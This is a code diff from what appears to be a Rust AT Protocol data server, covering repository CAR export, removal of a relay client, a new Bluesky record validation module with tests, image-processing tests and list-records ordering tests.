Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
)
.into_response();
} else {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not initialized"})),
)
.into_response();
}
}
};
let head_cid = match Cid::from_str(&head_str) {
Ok(c) => c,
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError", "message": "Invalid head CID"})),
)
.into_response();
}
};
let mut car_bytes = match encode_car_header(&head_cid) {
Ok(h) => h,
Err(e) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError", "message": format!("Failed to encode CAR header: {}", e)})),
)
.into_response();
}
};
let mut stack = vec![head_cid];
let mut visited = std::collections::HashSet::new();
let mut remaining = MAX_REPO_BLOCKS_TRAVERSAL;
while let Some(cid) = stack.pop() {
if visited.contains(&cid) {
continue;
}
visited.insert(cid);
if remaining == 0 {
break;
}
remaining -= 1;
if let Ok(Some(block)) = state.block_store.get(&cid).await {
let cid_bytes = cid.to_bytes();
let total_len = cid_bytes.len() + block.len();
let mut writer = Vec::new();
crate::sync::car::write_varint(&mut writer, total_len as u64)
.expect("Writing to Vec<u8> should never fail");
writer.write_all(&cid_bytes)
.expect("Writing to Vec<u8> should never fail");
writer.write_all(&block)
.expect("Writing to Vec<u8> should never fail");
car_bytes.extend_from_slice(&writer);
if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) {
extract_links_ipld(&value, &mut stack);
}
}
}
(
StatusCode::OK,
[(axum::http::header::CONTENT_TYPE, "application/vnd.ipld.car")],
car_bytes,
)
.into_response()
}
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
match value {
Ipld::Link(cid) => {
stack.push(*cid);
}
Ipld::Map(map) => {
for v in map.values() {
extract_links_ipld(v, stack);
}
}
Ipld::List(arr) => {
for v in arr {
extract_links_ipld(v, stack);
}
}
_ => {}
}
}

View File

@@ -2,11 +2,11 @@ pub mod blob;
pub mod car;
pub mod commit;
pub mod crawl;
pub mod deprecated;
pub mod firehose;
pub mod frame;
pub mod import;
pub mod listener;
pub mod relay_client;
pub mod repo;
pub mod subscribe_repos;
pub mod util;
@@ -15,6 +15,7 @@ pub mod verify;
pub use blob::{get_blob, list_blobs};
pub use commit::{get_latest_commit, get_repo_status, list_repos};
pub use crawl::{notify_of_update, request_crawl};
pub use repo::{get_blocks, get_repo, get_record};
pub use deprecated::{get_checkout, get_head};
pub use repo::{get_blocks, get_record, get_repo};
pub use subscribe_repos::subscribe_repos;
pub use verify::{CarVerifier, VerifiedCar, VerifyError};

View File

@@ -1,83 +0,0 @@
use crate::state::AppState;
use crate::sync::util::format_event_for_sending;
use futures::{sink::SinkExt, stream::StreamExt};
use std::time::Duration;
use tokio::sync::mpsc;
use tokio_tungstenite::{connect_async, tungstenite::Message};
use tracing::{error, info, warn};
async fn run_relay_client(state: AppState, url: String, ready_tx: Option<mpsc::Sender<()>>) {
info!("Starting firehose client for relay: {}", url);
loop {
match connect_async(&url).await {
Ok((mut ws_stream, _)) => {
info!("Connected to firehose relay: {}", url);
let mut rx = state.firehose_tx.subscribe();
if let Some(tx) = ready_tx.as_ref() {
tx.send(()).await.ok();
}
loop {
tokio::select! {
Ok(event) = rx.recv() => {
match format_event_for_sending(&state, event).await {
Ok(bytes) => {
if let Err(e) = ws_stream.send(Message::Binary(bytes.into())).await {
warn!("Failed to send event to {}: {}. Disconnecting.", url, e);
break;
}
}
Err(e) => {
error!("Failed to format event for relay {}: {}", url, e);
}
}
}
Some(msg) = ws_stream.next() => {
if let Ok(Message::Close(_)) = msg {
warn!("Relay {} closed connection.", url);
break;
}
}
else => break,
}
}
}
Err(e) => {
error!("Failed to connect to firehose relay {}: {}", url, e);
}
}
warn!(
"Disconnected from {}. Reconnecting in 5 seconds...",
url
);
tokio::time::sleep(Duration::from_secs(5)).await;
}
}
pub async fn start_relay_clients(
state: AppState,
relays: Vec<String>,
mut ready_rx: Option<mpsc::Receiver<()>>,
) {
if relays.is_empty() {
return;
}
let (ready_tx, mut internal_ready_rx) = mpsc::channel(1);
for url in relays {
let ready_tx = if ready_rx.is_some() {
Some(ready_tx.clone())
} else {
None
};
tokio::spawn(run_relay_client(state.clone(), url, ready_tx));
}
if let Some(mut rx) = ready_rx.take() {
tokio::spawn(async move {
internal_ready_rx.recv().await;
rx.close();
});
}
}

504
src/validation/mod.rs Normal file
View File

@@ -0,0 +1,504 @@
use serde_json::Value;
use thiserror::Error;
#[derive(Debug, Error)]
pub enum ValidationError {
#[error("No $type provided")]
MissingType,
#[error("Invalid $type: expected {expected}, got {actual}")]
TypeMismatch { expected: String, actual: String },
#[error("Missing required field: {0}")]
MissingField(String),
#[error("Invalid field value at {path}: {message}")]
InvalidField { path: String, message: String },
#[error("Invalid datetime format at {path}: must be RFC-3339/ISO-8601")]
InvalidDatetime { path: String },
#[error("Invalid record: {0}")]
InvalidRecord(String),
#[error("Unknown record type: {0}")]
UnknownType(String),
}
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ValidationStatus {
Valid,
Unknown,
Invalid,
}
pub struct RecordValidator {
require_lexicon: bool,
}
impl Default for RecordValidator {
fn default() -> Self {
Self::new()
}
}
impl RecordValidator {
pub fn new() -> Self {
Self {
require_lexicon: false,
}
}
pub fn require_lexicon(mut self, require: bool) -> Self {
self.require_lexicon = require;
self
}
pub fn validate(
&self,
record: &Value,
collection: &str,
) -> Result<ValidationStatus, ValidationError> {
let obj = record
.as_object()
.ok_or_else(|| ValidationError::InvalidRecord("Record must be an object".to_string()))?;
let record_type = obj
.get("$type")
.and_then(|v| v.as_str())
.ok_or(ValidationError::MissingType)?;
if record_type != collection {
return Err(ValidationError::TypeMismatch {
expected: collection.to_string(),
actual: record_type.to_string(),
});
}
if let Some(created_at) = obj.get("createdAt").and_then(|v| v.as_str()) {
validate_datetime(created_at, "createdAt")?;
}
match record_type {
"app.bsky.feed.post" => self.validate_post(obj)?,
"app.bsky.actor.profile" => self.validate_profile(obj)?,
"app.bsky.feed.like" => self.validate_like(obj)?,
"app.bsky.feed.repost" => self.validate_repost(obj)?,
"app.bsky.graph.follow" => self.validate_follow(obj)?,
"app.bsky.graph.block" => self.validate_block(obj)?,
"app.bsky.graph.list" => self.validate_list(obj)?,
"app.bsky.graph.listitem" => self.validate_list_item(obj)?,
"app.bsky.feed.generator" => self.validate_feed_generator(obj)?,
"app.bsky.feed.threadgate" => self.validate_threadgate(obj)?,
"app.bsky.labeler.service" => self.validate_labeler_service(obj)?,
_ => {
if self.require_lexicon {
return Err(ValidationError::UnknownType(record_type.to_string()));
}
return Ok(ValidationStatus::Unknown);
}
}
Ok(ValidationStatus::Valid)
}
fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("text") {
return Err(ValidationError::MissingField("text".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
if let Some(text) = obj.get("text").and_then(|v| v.as_str()) {
let grapheme_count = text.chars().count();
if grapheme_count > 3000 {
return Err(ValidationError::InvalidField {
path: "text".to_string(),
message: format!("Text exceeds maximum length of 3000 characters (got {})", grapheme_count),
});
}
}
if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) {
if langs.len() > 3 {
return Err(ValidationError::InvalidField {
path: "langs".to_string(),
message: "Maximum 3 languages allowed".to_string(),
});
}
}
if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) {
if tags.len() > 8 {
return Err(ValidationError::InvalidField {
path: "tags".to_string(),
message: "Maximum 8 tags allowed".to_string(),
});
}
for (i, tag) in tags.iter().enumerate() {
if let Some(tag_str) = tag.as_str() {
if tag_str.len() > 640 {
return Err(ValidationError::InvalidField {
path: format!("tags/{}", i),
message: "Tag exceeds maximum length of 640 bytes".to_string(),
});
}
}
}
}
Ok(())
}
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
let grapheme_count = display_name.chars().count();
if grapheme_count > 640 {
return Err(ValidationError::InvalidField {
path: "displayName".to_string(),
message: format!("Display name exceeds maximum length of 640 characters (got {})", grapheme_count),
});
}
}
if let Some(description) = obj.get("description").and_then(|v| v.as_str()) {
let grapheme_count = description.chars().count();
if grapheme_count > 2560 {
return Err(ValidationError::InvalidField {
path: "description".to_string(),
message: format!("Description exceeds maximum length of 2560 characters (got {})", grapheme_count),
});
}
}
Ok(())
}
fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("subject") {
return Err(ValidationError::MissingField("subject".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
self.validate_strong_ref(obj.get("subject"), "subject")?;
Ok(())
}
fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("subject") {
return Err(ValidationError::MissingField("subject".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
self.validate_strong_ref(obj.get("subject"), "subject")?;
Ok(())
}
fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("subject") {
return Err(ValidationError::MissingField("subject".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
if !subject.starts_with("did:") {
return Err(ValidationError::InvalidField {
path: "subject".to_string(),
message: "Subject must be a DID".to_string(),
});
}
}
Ok(())
}
fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("subject") {
return Err(ValidationError::MissingField("subject".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
if !subject.starts_with("did:") {
return Err(ValidationError::InvalidField {
path: "subject".to_string(),
message: "Subject must be a DID".to_string(),
});
}
}
Ok(())
}
fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("name") {
return Err(ValidationError::MissingField("name".to_string()));
}
if !obj.contains_key("purpose") {
return Err(ValidationError::MissingField("purpose".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
if let Some(name) = obj.get("name").and_then(|v| v.as_str()) {
if name.is_empty() || name.len() > 64 {
return Err(ValidationError::InvalidField {
path: "name".to_string(),
message: "Name must be 1-64 characters".to_string(),
});
}
}
Ok(())
}
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("subject") {
return Err(ValidationError::MissingField("subject".to_string()));
}
if !obj.contains_key("list") {
return Err(ValidationError::MissingField("list".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
Ok(())
}
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("did") {
return Err(ValidationError::MissingField("did".to_string()));
}
if !obj.contains_key("displayName") {
return Err(ValidationError::MissingField("displayName".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
if display_name.is_empty() || display_name.len() > 240 {
return Err(ValidationError::InvalidField {
path: "displayName".to_string(),
message: "displayName must be 1-240 characters".to_string(),
});
}
}
Ok(())
}
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("post") {
return Err(ValidationError::MissingField("post".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
Ok(())
}
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
if !obj.contains_key("policies") {
return Err(ValidationError::MissingField("policies".to_string()));
}
if !obj.contains_key("createdAt") {
return Err(ValidationError::MissingField("createdAt".to_string()));
}
Ok(())
}
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
let obj = value
.and_then(|v| v.as_object())
.ok_or_else(|| ValidationError::InvalidField {
path: path.to_string(),
message: "Must be a strong reference object".to_string(),
})?;
if !obj.contains_key("uri") {
return Err(ValidationError::MissingField(format!("{}/uri", path)));
}
if !obj.contains_key("cid") {
return Err(ValidationError::MissingField(format!("{}/cid", path)));
}
if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) {
if !uri.starts_with("at://") {
return Err(ValidationError::InvalidField {
path: format!("{}/uri", path),
message: "URI must be an at:// URI".to_string(),
});
}
}
Ok(())
}
}
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
if chrono::DateTime::parse_from_rfc3339(value).is_err() {
return Err(ValidationError::InvalidDatetime {
path: path.to_string(),
});
}
Ok(())
}
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
if rkey.is_empty() {
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
}
if rkey.len() > 512 {
return Err(ValidationError::InvalidRecord("Record key exceeds maximum length of 512".to_string()));
}
if rkey == "." || rkey == ".." {
return Err(ValidationError::InvalidRecord("Record key cannot be '.' or '..'".to_string()));
}
let valid_chars = rkey.chars().all(|c| {
c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~'
});
if !valid_chars {
return Err(ValidationError::InvalidRecord(
"Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')".to_string()
));
}
Ok(())
}
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
if collection.is_empty() {
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
}
let parts: Vec<&str> = collection.split('.').collect();
if parts.len() < 3 {
return Err(ValidationError::InvalidRecord(
"Collection NSID must have at least 3 segments".to_string()
));
}
for part in &parts {
if part.is_empty() {
return Err(ValidationError::InvalidRecord(
"Collection NSID segments cannot be empty".to_string()
));
}
if !part.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') {
return Err(ValidationError::InvalidRecord(
"Collection NSID segments must be alphanumeric or hyphens".to_string()
));
}
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use serde_json::json;
#[test]
fn test_validate_post() {
let validator = RecordValidator::new();
let valid_post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello, world!",
"createdAt": "2024-01-01T00:00:00.000Z"
});
assert_eq!(
validator.validate(&valid_post, "app.bsky.feed.post").unwrap(),
ValidationStatus::Valid
);
}
#[test]
fn test_validate_post_missing_text() {
let validator = RecordValidator::new();
let invalid_post = json!({
"$type": "app.bsky.feed.post",
"createdAt": "2024-01-01T00:00:00.000Z"
});
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
}
#[test]
fn test_validate_type_mismatch() {
let validator = RecordValidator::new();
let record = json!({
"$type": "app.bsky.feed.like",
"subject": {"uri": "at://did:plc:test/app.bsky.feed.post/123", "cid": "bafyrei..."},
"createdAt": "2024-01-01T00:00:00.000Z"
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
}
#[test]
fn test_validate_unknown_type() {
let validator = RecordValidator::new();
let record = json!({
"$type": "com.example.custom",
"data": "test"
});
assert_eq!(
validator.validate(&record, "com.example.custom").unwrap(),
ValidationStatus::Unknown
);
}
#[test]
fn test_validate_unknown_type_strict() {
let validator = RecordValidator::new().require_lexicon(true);
let record = json!({
"$type": "com.example.custom",
"data": "test"
});
let result = validator.validate(&record, "com.example.custom");
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
}
#[test]
fn test_validate_record_key() {
assert!(validate_record_key("valid-key_123").is_ok());
assert!(validate_record_key("3k2n5j2").is_ok());
assert!(validate_record_key(".").is_err());
assert!(validate_record_key("..").is_err());
assert!(validate_record_key("").is_err());
assert!(validate_record_key("invalid/key").is_err());
}
#[test]
fn test_validate_collection_nsid() {
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
assert!(validate_collection_nsid("invalid").is_err());
assert!(validate_collection_nsid("a.b").is_err());
assert!(validate_collection_nsid("").is_err());
}
}

315
tests/image_processing.rs Normal file
View File

@@ -0,0 +1,315 @@
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
use image::{DynamicImage, ImageFormat};
use std::io::Cursor;
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
buf
}
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
buf
}
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
buf
}
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
buf
}
#[test]
fn test_process_png() {
let processor = ImageProcessor::new();
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.width, 500);
assert_eq!(result.original.height, 500);
}
#[test]
fn test_process_jpeg() {
let processor = ImageProcessor::new();
let data = create_test_jpeg(400, 300);
let result = processor.process(&data, "image/jpeg").unwrap();
assert_eq!(result.original.width, 400);
assert_eq!(result.original.height, 300);
}
#[test]
fn test_process_gif() {
let processor = ImageProcessor::new();
let data = create_test_gif(200, 200);
let result = processor.process(&data, "image/gif").unwrap();
assert_eq!(result.original.width, 200);
assert_eq!(result.original.height, 200);
}
#[test]
fn test_process_webp() {
let processor = ImageProcessor::new();
let data = create_test_webp(300, 200);
let result = processor.process(&data, "image/webp").unwrap();
assert_eq!(result.original.width, 300);
assert_eq!(result.original.height, 200);
}
#[test]
fn test_thumbnail_feed_size() {
let processor = ImageProcessor::new();
let data = create_test_png(800, 600);
let result = processor.process(&data, "image/png").unwrap();
let thumb = result.thumbnail_feed.expect("Should generate feed thumbnail for large image");
assert!(thumb.width <= THUMB_SIZE_FEED);
assert!(thumb.height <= THUMB_SIZE_FEED);
}
#[test]
fn test_thumbnail_full_size() {
let processor = ImageProcessor::new();
let data = create_test_png(2000, 1500);
let result = processor.process(&data, "image/png").unwrap();
let thumb = result.thumbnail_full.expect("Should generate full thumbnail for large image");
assert!(thumb.width <= THUMB_SIZE_FULL);
assert!(thumb.height <= THUMB_SIZE_FULL);
}
#[test]
fn test_no_thumbnail_small_image() {
let processor = ImageProcessor::new();
let data = create_test_png(100, 100);
let result = processor.process(&data, "image/png").unwrap();
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
}
#[test]
fn test_webp_conversion() {
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
let data = create_test_png(300, 300);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.mime_type, "image/webp");
}
#[test]
fn test_jpeg_output_format() {
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
let data = create_test_png(300, 300);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.mime_type, "image/jpeg");
}
#[test]
fn test_png_output_format() {
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
let data = create_test_jpeg(300, 300);
let result = processor.process(&data, "image/jpeg").unwrap();
assert_eq!(result.original.mime_type, "image/png");
}
#[test]
fn test_max_dimension_enforced() {
let processor = ImageProcessor::new().with_max_dimension(1000);
let data = create_test_png(2000, 2000);
let result = processor.process(&data, "image/png");
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
if let Err(ImageError::TooLarge { width, height, max_dimension }) = result {
assert_eq!(width, 2000);
assert_eq!(height, 2000);
assert_eq!(max_dimension, 1000);
}
}
#[test]
fn test_file_size_limit() {
let processor = ImageProcessor::new().with_max_file_size(100);
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png");
assert!(matches!(result, Err(ImageError::FileTooLarge { .. })));
if let Err(ImageError::FileTooLarge { size, max_size }) = result {
assert!(size > 100);
assert_eq!(max_size, 100);
}
}
#[test]
fn test_default_max_file_size() {
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
}
#[test]
fn test_unsupported_format_rejected() {
let processor = ImageProcessor::new();
let data = b"this is not an image";
let result = processor.process(data, "application/octet-stream");
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
}
#[test]
fn test_corrupted_image_handling() {
let processor = ImageProcessor::new();
let data = b"\x89PNG\r\n\x1a\ncorrupted data here";
let result = processor.process(data, "image/png");
assert!(matches!(result, Err(ImageError::DecodeError(_))));
}
#[test]
fn test_aspect_ratio_preserved_landscape() {
let processor = ImageProcessor::new();
let data = create_test_png(1600, 800);
let result = processor.process(&data, "image/png").unwrap();
let thumb = result.thumbnail_full.expect("Should have thumbnail");
let original_ratio = 1600.0 / 800.0;
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
}
#[test]
fn test_aspect_ratio_preserved_portrait() {
let processor = ImageProcessor::new();
let data = create_test_png(800, 1600);
let result = processor.process(&data, "image/png").unwrap();
let thumb = result.thumbnail_full.expect("Should have thumbnail");
let original_ratio = 800.0 / 1600.0;
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
}
#[test]
fn test_mime_type_detection_auto() {
let processor = ImageProcessor::new();
let data = create_test_png(100, 100);
let result = processor.process(&data, "application/octet-stream");
assert!(result.is_ok(), "Should detect PNG format from data");
}
#[test]
fn test_is_supported_mime_type() {
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
assert!(ImageProcessor::is_supported_mime_type("image/png"));
assert!(ImageProcessor::is_supported_mime_type("image/gif"));
assert!(ImageProcessor::is_supported_mime_type("image/webp"));
assert!(ImageProcessor::is_supported_mime_type("IMAGE/PNG"));
assert!(ImageProcessor::is_supported_mime_type("Image/Jpeg"));
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
}
#[test]
fn test_strip_exif() {
let data = create_test_jpeg(100, 100);
let result = ImageProcessor::strip_exif(&data);
assert!(result.is_ok());
let stripped = result.unwrap();
assert!(!stripped.is_empty());
}
#[test]
fn test_with_thumbnails_disabled() {
let processor = ImageProcessor::new().with_thumbnails(false);
let data = create_test_png(2000, 2000);
let result = processor.process(&data, "image/png").unwrap();
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
}
#[test]
fn test_builder_chaining() {
let processor = ImageProcessor::new()
.with_max_dimension(2048)
.with_max_file_size(5 * 1024 * 1024)
.with_output_format(OutputFormat::Jpeg)
.with_thumbnails(true);
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.mime_type, "image/jpeg");
}
#[test]
fn test_processed_image_fields() {
let processor = ImageProcessor::new();
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert!(!result.original.data.is_empty());
assert!(!result.original.mime_type.is_empty());
assert!(result.original.width > 0);
assert!(result.original.height > 0);
}
#[test]
fn test_only_feed_thumbnail_for_medium_images() {
let processor = ImageProcessor::new();
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
}
#[test]
fn test_both_thumbnails_for_large_images() {
let processor = ImageProcessor::new();
let data = create_test_png(2000, 2000);
let result = processor.process(&data, "image/png").unwrap();
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
}
#[test]
fn test_exact_threshold_boundary_feed() {
let processor = ImageProcessor::new();
let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
let result = processor.process(&at_threshold, "image/png").unwrap();
assert!(result.thumbnail_feed.is_none(), "Exact threshold should not generate thumbnail");
let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
let result = processor.process(&above_threshold, "image/png").unwrap();
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
}
#[test]
fn test_exact_threshold_boundary_full() {
let processor = ImageProcessor::new();
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
let result = processor.process(&at_threshold, "image/png").unwrap();
assert!(result.thumbnail_full.is_none(), "Exact threshold should not generate thumbnail");
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
let result = processor.process(&above_threshold, "image/png").unwrap();
assert!(result.thumbnail_full.is_some(), "Above threshold should generate thumbnail");
}

View File

@@ -217,6 +217,7 @@ async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_valid_signature_and_mock_plc -- --ignored --test-threads=1"]
async fn test_import_with_valid_signature_and_mock_plc() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -266,6 +267,7 @@ async fn test_import_with_valid_signature_and_mock_plc() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_wrong_signing_key_fails -- --ignored --test-threads=1"]
async fn test_import_with_wrong_signing_key_fails() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -322,6 +324,7 @@ async fn test_import_with_wrong_signing_key_fails() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_did_mismatch_fails -- --ignored --test-threads=1"]
async fn test_import_with_did_mismatch_fails() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -373,6 +376,7 @@ async fn test_import_with_did_mismatch_fails() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_plc_resolution_failure -- --ignored --test-threads=1"]
async fn test_import_with_plc_resolution_failure() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -424,6 +428,7 @@ async fn test_import_with_plc_resolution_failure() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_no_signing_key_in_did_doc -- --ignored --test-threads=1"]
async fn test_import_with_no_signing_key_in_did_doc() {
let client = client();
let (token, did) = create_account_and_login(&client).await;

View File

@@ -0,0 +1,554 @@
mod common;
mod helpers;
use common::*;
use helpers::*;
use chrono::Utc;
use reqwest::StatusCode;
use serde_json::{Value, json};
use std::time::Duration;
async fn create_post_with_rkey(
client: &reqwest::Client,
did: &str,
jwt: &str,
rkey: &str,
text: &str,
) -> (String, String) {
let payload = json!({
"repo": did,
"collection": "app.bsky.feed.post",
"rkey": rkey,
"record": {
"$type": "app.bsky.feed.post",
"text": text,
"createdAt": Utc::now().to_rfc3339()
}
});
let res = client
.post(format!(
"{}/xrpc/com.atproto.repo.putRecord",
base_url().await
))
.bearer_auth(jwt)
.json(&payload)
.send()
.await
.expect("Failed to create record");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
(
body["uri"].as_str().unwrap().to_string(),
body["cid"].as_str().unwrap().to_string(),
)
}
#[tokio::test]
async fn test_list_records_default_order() {
let client = client();
let (did, jwt) = setup_new_user("list-default-order").await;
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
tokio::time::sleep(Duration::from_millis(50)).await;
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
tokio::time::sleep(Duration::from_millis(50)).await;
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
assert_eq!(records.len(), 3);
let rkeys: Vec<&str> = records
.iter()
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
.collect();
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
}
#[tokio::test]
async fn test_list_records_reverse_true() {
let client = client();
let (did, jwt) = setup_new_user("list-reverse").await;
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
tokio::time::sleep(Duration::from_millis(50)).await;
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
tokio::time::sleep(Duration::from_millis(50)).await;
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("reverse", "true"),
])
.send()
.await
.expect("Failed to list records");
